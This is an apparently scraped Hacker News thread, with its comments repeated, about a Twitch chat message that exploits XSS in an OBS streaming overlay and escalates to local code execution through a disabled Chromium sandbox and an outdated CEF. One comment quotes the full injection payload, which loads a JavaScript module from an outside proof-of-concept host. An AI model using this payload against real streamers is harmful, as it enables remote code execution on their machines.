dang42m agoHN ↗Url changed from https://cyberinsider.com/malicious-twitch-chat-messages-can-..., which points to this.
verteu35m agoHN ↗tldr: XSS on OBS via the message !image http://toto.jpg/x'onerror=import('https://ha10.scrt.ch:8080/poc-module.js');a='a
Macha9m agoHN ↗The interesting part IMO is less the XSS on the streamer's overlay, but the fact that it could escape the browser source web page into local code execution (via a combination of OBS disabling the chromium sandbox, and using an outdated CEF version)
Url changed from https://cyberinsider.com/malicious-twitch-chat-messages-can-..., which points to this.
tldr: XSS on OBS via the message
The interesting part IMO is less the XSS on the streamer's overlay, but the fact that it could escape the browser source web page into local code execution (via a combination of OBS disabling the chromium sandbox, and using an outdated CEF version)